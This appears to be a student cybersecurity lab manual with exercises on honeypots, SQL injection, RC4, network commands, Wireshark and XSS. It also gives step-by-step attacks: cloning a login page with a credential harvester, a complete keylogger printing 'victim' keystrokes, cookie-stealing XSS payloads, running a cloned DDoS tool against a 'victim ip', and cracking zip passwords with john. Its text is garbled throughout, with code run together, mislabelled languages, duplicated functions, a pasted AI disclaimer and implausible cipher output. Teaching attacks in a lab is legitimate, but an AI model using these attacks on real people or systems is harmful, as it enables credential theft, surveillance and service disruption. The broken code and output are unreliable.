Ex.

No:

Date:

AIM:

DESCRIPTION:
A honeypot is a cybersecurity resource designed to attract and trap malicious actors. It
operates by imitating vulnerable systems or services to entice attackers, diverting their
attention from genuine assets. Honeypots are isolated from critical infrastructure,
ensuring that any compromise does not impact operational systems. They come in
various forms, including high-interaction (emulating complete systems) and low-
interaction (simulating specific services) models. The primary purpose of honeypots is
to gather intelligence on attacker tactics, techniques, and motivations. Security
professionals use honeypot data for threat analysis, vulnerability assessment, and
incident response preparation.

PROGRAM:

Here's a sample code for setting up a honeypot using Cowrie honeypot software and
monitoring it in Python:

Install Cowrie:
Arduino
sudo apt-get install cowrie

Create a virtual environment:

Bash
sudo apt-get install python3-venv python3 -m venv cowrie-env source cowrie-
env/bin/activate

Configure Cowrie:
bash
cd cowrie-env
cp -r /usr/share/cowrie/cowrie . cd cowrie
nano cowrie.cfg
Start Cowrie:
bash
./bin/cowrie start
Monitor Cowrie using Python:
Python
import paramiko import time

def ssh_connect(ip, port, username, password): ssh = paramiko.SSHClient()

ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, port=port,
username=username, password=password) return ssh

def monitor(ip, port, username, password):

ssh = ssh_connect(ip, port, username, password) while True:

try:
stdin, stdout, stderr = ssh.exec_command('tail -f
/opt/cowrie/var/log/cowrie/cowrie.json') for line in iter(stdout.readline, ""):
print(line, end="") time.sleep(1)
except Exception as e: print(f"Exception: {e}") ssh.close()
ssh = ssh_connect(ip, port, username, password)

monitor("10.0.2.15", 22, "root", "password")

OUTPUT:
RESULT:
Ex.No:

Date:

AIM:

DESCRIPTION:
An SQL Injection Attack is a type of cyberattack where malicious SQL code is injected
into a vulnerable SQL query via input fields on a website or application. This allows
attackers to manipulate the database backend, potentially accessing or modifying
sensitive data. The attack exploits poor input validation and insecure coding practices,
enabling unauthorized retrieval, deletion, or alteration of database information. SQL
Injection can lead to data breaches, identity theft, or compromise of the entire system.
Attackers use techniques like UNION-based, Boolean-based, or time-based blind
injections to extract data or bypass authentication.

PROGRAM:
As an AI language model, I don't have the capability to execute code or scripts directly.
However, I can provide you with an example scenario of an SQL injection attack, which
can be used as a lab exercise to demonstrate the vulnerability.
Suppose you have a simple web application that allows users to search for products in a
database using a search bar. The search functionality is implemented using an SQL
query as follows:
Sql
SELECT * FROM products WHERE name LIKE '%search_term%';
Here, search_term is the input provided by the user. The query is designed to
return all products whose name contains the search term.
However, this implementation is vulnerable to SQL injection attacks. An attacker
can exploit this vulnerability by providing a specially crafted input that alters the
SQL query's behavior.
For example, an attacker can enter the following input into the search bar: vbnet
' OR 1=1 –
This input will modify the SQL query as follows:
sql
SELECT * FROM products WHERE name LIKE '%' OR 1=1 -- %';
The -- symbol indicates the start of a comment, causing the rest of the query to be
ignored. The modified query will return all products in the database, regardless
of their name, because the condition 1=1 is always true.
To prevent SQL injection attacks, it is recommended to use parameterized queries,
which allow the application to separate the input from the SQL code. The
following example shows how to use parameterized queries to implement the same
search functionality:
sql
SELECT * FROM products WHERE name LIKE ?;
Here, the ? symbol indicates a parameter placeholder. The application can then
bind the user input to the parameter, as follows:
csharp
query = "SELECT * FROM products WHERE name LIKE ?"; params =
(search_term,)
cursor.execute(query, params)
This implementation ensures that the user input is properly sanitized before it is
used in the SQL query, preventing SQL injection attacks.
OUTPUT:
RESULT:
 Ex.No:

Date:

AIM:

DESCRIPTION:

Phishing is a type of cyberattack where malicious actors impersonate legitimate

entities (like banks, companies, or government agencies) to trick individuals into
revealing sensitive information such as passwords, credit card numbers, or personal
details. This is typically done through deceptive emails, messages, or websites that
appear authentic. The goal of phishing is to steal confidential data or gain
unauthorized access to accounts for fraudulent purposes. Phishing attacks often
exploit human psychology, using urgency or fear to prompt victims to act quickly
without verifying the legitimacy of the request. Common phishing techniques
include spear phishing (targeting specific individuals) and pharming (redirecting
victims to fake websites).

ALGORITHM:

Step 1. Start the Kali.

Step 2. Open the Social Engineering Tool kit.

Step 3. Enter the Password.

Step 4. Choose the Website Attack Vectors.

Step 5. Choose Credential Harvester Attack Method.

Step 6. Choose Site Cloner.

Step 7. Enter the IP address .

Step 8. Paste the Social website URL link.

Step 9. Go to the fire fox and paste the IP address.

Step 10. Then open the Phishing login page.

OUTPUT:
RESULT:
 Ex.No:

Date:

AIM:

DESCRIPTION:

RC4 (Rivest Cipher 4) is a popular symmetric stream cipher used for encryption
and decryption of data. It was designed by Ron Rivest in 1987 and became widely
adopted due to its simplicity and efficiency. RC4 operates by generating a
pseudorandom stream of bytes (keystream) based on a secret key provided by the
user. This keystream is then XORed (exclusive OR operation) with the plaintext to
produce the ciphertext, and the same process is used for decryption.

PROGRAM:

To implement RC4 encryption and decryption in CRYPT TOOL lab coding, you
can follow the steps below:
Import the necessary libraries:
Arduino
#include <stdio.h> #include <stdlib.h> #include <string.h>
Define the RC4 key schedule:
Css
void rc4_init(unsigned char *key_data_ptr, int key_data_len, unsigned char *key)
{
int i, j;

/* Initialize RC4 state array */ for (i = 0; i < 256; i++) {

key[i] = i;
}

/* Set j to zero */ j = 0;

/* Mix up the state array using the key */ for (i = 0; i < 256; i++) {
j = (j + key[i] + key_data_ptr[i % key_data_len]) % 256;

swap_bytes(key + i, key + j);

}
} void rc4_init(unsigned char *key_data_ptr, int key_data_len, unsigned char
*key)
{
int i, j;

/* Initialize RC4 state array */ for (i = 0; i < 256; i++) {

key[i] = i;
}

/* Set j to zero */ j = 0;

/* Mix up the state array using the key */ for (i = 0; i < 256; i++) {
j = (j + key[i] + key_data_ptr[i % key_data_len]) % 256; swap_bytes(key + i, key
+ j);
}
}
Implement the RC4 encryption function:
Arduino
void rc4(unsigned char *data, int data_len, unsigned char *key, int key_len)
{
int i, j; unsigned char t;

/* Initialize RC4 state */ i = j = 0;

/* XOR each byte in the data with a byte from the RC4 keystream */ for (int n = 0;
n < data_len; n++) {
i = (i + 1) % 256;
j = (j + key[i]) % 256; swap_bytes(key + i, key + j); t = (key[i] + key[j]) % 256;
data[n] ^= key[t];
}
}

Implement the RC4 decryption function:

Arduino
void rc4_decrypt(unsigned char *data, int data_len, unsigned char *key, int
key_len)
{
/* RC4 decryption is the same as encryption */ rc4(data, data_len, key, key_len);
}
Define the main function:
Scss
int main()
{
/* Declare variables */
unsigned char key[256], password[256], encrypted_password[256],
decrypted_password[256];

int key_len, password_len;

/* Get the password from the user */ printf("Enter password: "); scanf("%s",
password); password_len = strlen(password);

/* Generate an RC4 key from the password */ key_len = password_len;

rc4_init(password, password_len, key);

/* Encrypt the password using RC4 */ memcpy(encrypted_password, password,

password_len); rc4(encrypted_password, password_len, key, key_len);

/* Print the encrypted password */

printf("Encrypted password: %s\n", encrypted_password);

/* Decrypt the password using RC4 */ memcpy(decrypted_password,

encrypted_password, password_len); rc4_decrypt(decrypted_password,
password_len, key, key_len);

/* Print the decrypted password */

printf("Decrypted password: %s\n", decrypted_password);

return 0;
}
Note that the swap_bytes function used in the rc4_init function and the rc4
function is a helper function that swaps the values of two bytes:
Arduino
void swap_bytes(unsigned char *a, unsigned char *b)
{
unsigned char temp = *a;
*a = *b;
*b = temp;
}
This should provide you with a basic implementation of RC4 encryption and
decryption in CRYPT TOOL lab coding.
OUTPUT:

ENCRYPTION:

Plain Text:
Hello Everyone
Cipher Text:
00000000 35 4B 53 BD 12 E5 9D 6A 18 EA A1 16 EB EP 5KS
0000000E

DECRYPTION:

Cipher Text:
00000000 35 4B 53 BD 12 E5 9D 6A 18 EA A1 16 EB EP 5KS
0000000E
Plain Text:
Hello Everyone
RESULT:
 Ex.No:

Date:

AIM:

DESCRIPTION:
Ping: The `ping` command is used to test the reachability of a host on a network by
sending ICMP echo request packets and waiting for ICMP echo reply packets.
ipconfig: The `ipconfig` command (on Windows) displays the configuration of network
interfaces, including IP addresses, subnet masks, and default gateway information.
Traceroute: The `traceroute` command (or `tracert` on Windows) is used to trace the
route that packets take from the local system to a specified destination by sending ICMP
echo packets with increasing TTL (Time To Live) values.
Netstat: The `netstat` command displays network connections, routing tables, interface
statistics, and other network-related information including listening ports and active
connections.

PROGRAM:

The ping command

ping is one of the most popular command line tools used both by IT professionals
and users. Ping is used to verify that the local machine has an internet connection
without launching a web browser.
Fig. 1: A popular way to test internet connection in a command line tool
In a different scenario, to find out whether the problem relies on the application or the
server, technicians can use ping to check if the server's IP address is reachable or not.

Fig. 2 : A ping example command

In figure 2, the server is still accessible through the ping command, which means we
need to further investigate why the web application is inaccessible.

ping comes with a number of parameters to support the network debugging process.
For more ping options, run ping –help.
 Fig. 3: ping options displayed in a command line interface

We can also add a timestamp before each line in the ping output. ping -D
zoho.com

Fig. 4: Running ping -d on a Linux machine

Note that ping options may vary between Linux and Windows operating systems, so you will
first need to check for the available options.

Using traceroute

traceroute is used to identify the path from starting point to destination.

Traceroute is a more powerful tool that can help uncover problems
that ping cannot. Here’s an example for the traceroute command with Zoho.com:

Fig. 5 : A traceroute check for Zoho.com

traceroute to Zoho.com (136.143.190.155), 30 hops max, 60 byte packets

This tells us that there is a maximum number of 30 hops from the client to the Zoho.com
server.

11 ae16.cr2.sjc2.us.zip.zayo.com (64.125.31.14)
256.322ms 256.295 ms 247.383 ms
The first column shows the number of the hop (11), while the second column displays the hop
address:

ae16.cr2.sjc2.us.zip.zayo.com (64.125.31.14)

The third column shows three different times in milliseconds for each packet. We can
configure the number of packets to be sent by running.

traceroute -q [number of packets] Zoho.com

Fig. 6 : traceroute run with options for sending seven packets

For the full list of options that traceroute supports, run traceroute –help.
 Fig. 7 : traceroute options

traceroute is a handy tool for determining response delays and routing loops or locating points
of failure when reaching a certain destination.
However, traceroute messages are often blocked by routers in many autonomous systems,
which can make traceroute results inaccurate.

To make sure we get accurate information, we will first need to look up the autonomous
systems with dig or whois, then combine these tools with traceroute.

The netstat tool

netstat is a command line tool that shows users all network connections at one end point in
their local machine. This is useful when we want to know if a process is running
successfully or whether a specific port is in use.

For example, we can run netstat on a Windows machine and see what information we’ll get.
Fig. 8 : netstat showing a list of connections

Here we have a list showing active connections, protocols, the local address with the
corresponding port, the foreign addresses, and the state of the process.

For another example, we’ll start a PostgreSQL server in our local machine, but there's an error
coming up showing that port 5432 is currently in use. To find out which process is currently
running on this port, we will need to
combine netstat with the grep command.

netstat -ltnp | grep -w '5432'

Fig. 9 : Check the process running on port 5432 with netstat and grep

We can see from figure 9 that there is a PostgreSQL process running on port 5432, so
there’s no need to trigger the PostgreSQL server again.
netstat comes with multiple options for different scenarios. netstat –help will show us the
full list of options.

Fig. 10: The full list of netstat options

OUTPUT:
RESULT:
 Ex.No:

Date:

AIM:

DESCRIPTION:

A keylogger is a type of malicious software or hardware designed to covertly capture

and record keystrokes made by a user on a computer or mobile device. It can log
everything typed, including usernames, passwords, credit card numbers, and other
sensitive information. Keyloggers can operate at various levels of the system, from
software-based applications running in the background to hardware devices installed
between the keyboard and computer. They are often used for unauthorized surveillance
or cyber espionage. Detecting keyloggers can be challenging as they can operate
stealthily without the user's knowledge. Preventive measures include using reputable
antivirus software, keeping systems updated, and being cautious of suspicious links or
downloads.

ALGORITHM:
1.Start the python program.

2.Save the python file.

3.Open the Command prompt(cmd).

4.Enter the command ( python -m pip install --upgrade pip).

5.Install the pynput package (pip install pynput).

6.Go to particular python file (eg:- cd Desktop).

7.Enter the command (python keylogger.py).

PROGRAM:

import pynput.keyboard as pavi

stored_key=""

def key_press(key):

global stored_key

try:
stored_key=stored_key + str(key.char)

print(stored_key) #display victim key_strokes

except AttributeError:

if key==key.space or key.backspace:
stored_key=stored_key+" "
print(" ")
else:

stored_key = stored_key +" "+ str(key)+ " "

print(stored_key) # display victim key_stocks

""" callback function

|
V """

key_record=pavi.Listener(on_press=key_press)

#using with command

with key_record as listener:

listener.join()
OUTPUT:

KEYS ENTERED:
1234ASDFG

KEYLOGGER:
1
12
123
1234
1234A
1234AS
1234ASD
1234ASDF
1234ASDFG
RESULT:
 Ex.No:

Date:

AIM:

DESCRIPTION:
Wireshark is a powerful open-source network protocol analyzer used for
troubleshooting, analysis, and security auditing of network traffic. It captures
and displays packet-level details of network communications in real-time.
Users can inspect packets, dissect protocols, and analyze traffic patterns to
diagnose network issues or detect malicious activity. Wireshark supports a
wide range of protocols and can capture data from Ethernet, Wi-Fi,
Bluetooth, USB, and other interfaces. It provides filtering and search
capabilities to focus on specific traffic of interest. Wireshark is commonly
used by network administrators, security professionals, and developers for
network troubleshooting, protocol development, and educational purposes.
However, it should be used ethically and in compliance with legal regulations
to avoid privacy violations.

PROGRAM:

Getting Up and Running: After installation launch Wireshark, approve the

administrator or superuser privileges and you will be presented with a
window that looks like this:
This window shows the interfaces on your device. To start sniffing select one
interface and click on the bluefin icon on the top left. The data capture screen has
three panes. The top pane shows real-time traffic, the middle one shows
information about the chosen packet and the bottom pane shows the raw packet
data. The top pane shows source address(IPv4 or IPv6) destination address,
source and destination ports, protocol to which the packet belongs to and
additional information about the packet.
OUTPUT:
RESULT:
 Ex.No:

Date:

AIM:

DESCRIPTION:

Cross-Site Scripting (XSS) is a common web application vulnerability where

attackers inject malicious scripts into web pages viewed by other users. These
scripts execute within the victim's browser, allowing attackers to steal
cookies, session tokens, or perform actions on behalf of the victim. XSS
exploits insecure input handling, such as failing to properly validate or
sanitize user-supplied data, which then gets executed as code in the victim's
browser. There are three main types of XSS: reflected (where the malicious
payload is part of the request URL), stored (where the payload is stored on
the server and served to multiple users), and DOM-based (where the payload
is processed client-side by modifying the DOM). To prevent XSS, developers
should sanitize input, encode output, and use security headers like Content
Security Policy (CSP).

ALGORITHM:

Step-1: Go to port swigger website and Login with temp mail into website

Step-2: Verify for password in inbox and go to academy section and vulnerability labs

Step-3: Read stored cross site scripting

Step-4: Open the “ XSS ” lab

Step-5: Read the questions in the lab and and apply the script which is suitable for the
questions.
SCRIPTS:
1) Reflected XSS into HTML context with nothing encoded :

<script>alert(“BOOM You hacked!!!”)<script/>

2) Stored XSS into HTML context with nothing encoded :

<script>alert(“You hacked!!!”)<script/>
3) DOM XSS in document.write in sink using source location.search:

“><svg onload=alert(1)>
4) DOM XSS in innerHTML sink using source location.search:

<img src=1 onerror=alert(1)>

5) DOM XSS in jQuery anchor href attribute sink using location.search:

javascript:alert(document.cookie)
OUTPUT:
RESULT:
Ex.No:

Date:

AIM:

DESCRIPTION:

A Distributed Denial of Service (DDoS) attack is a malicious attempt to

disrupt the normal traffic of a targeted server, service, or network by
overwhelming it with a flood of traffic from multiple sources. This flood of
traffic, often generated by a botnet of compromised devices, consumes the
target's resources such as bandwidth, processing power, or network
connections, rendering the service unavailable to legitimate users. DDoS
attacks can be launched using various techniques, including ICMP flooding,
SYN flooding, HTTP flooding, and UDP flooding. The motive behind DDoS
attacks can range from extortion to political activism or simply causing
disruption.

ALGORITHM:

Step 1: Open your kali linux.

Step 2: Open the terminal.
Step 3: Go to root access(eg:- sudo su)
Step 4: Then install `ddos` package.
Step 5: Attack your victim using IP address
PROCEDURE:

*How To Install GAMKERS-DDOS In Terminal The Tool Installation

Process Is Very Easy.. Just Open Your Terminal & Type This Provided
Commands!!
$ apt update
$ apt upgrade -y
$ apt install python
$ apt install python2
$ apt install git
$ apt install figlet
$ git clone https://github.com/gamkers/GAMKERS-DDOS.git
$ cd GAMKERS-DDOS
$ chmod +x GAMKERS-DDOS.py
$ python2 GAMKERS-DDOS.py
To Run
$ cd GAMKERS-DDOS
$ python2 GAMKERS-DDOS.py
*Enter your victim ip: <ip address>
*Enter port :8080
OUTPUT:
RESULT:
 Ex.No:

Date:

AIM:

DESCRIPTION:

A brute force attack is a method used by malicious actors to gain unauthorized access to
a system or account by systematically trying all possible combinations of usernames,
passwords, or encryption keys. This attack relies on the sheer computational power to
exhaustively try every possible combination until the correct one is found. Brute force
attacks are effective against weak or easily guessable passwords and can be automated
using specialized software or scripts. They can compromise systems, accounts, or
encrypted data given enough time and computing resources. To defend against brute
force attacks, organizations should enforce strong password policies, implement account
lockout mechanisms after failed login attempts, and use multi-factor authentication to
increase security.

ALGORITHM:

Step 1: Open kali linux.

Step 2: Download or copy to past particular protected zipfile.

Step 3: Go to particular zipfile path(eg:- cd Download).

Step 4: start to attack.

Step 5: Display password.
PROCEDURE:

*How to find out the password*

$ cd Download (or) cd Particular zip file path.

$ ls(eg:- file.zip)

$ zip2john Cyb.zip > c1.hash

$ john c1.hash
OUTPUT:
RESULT: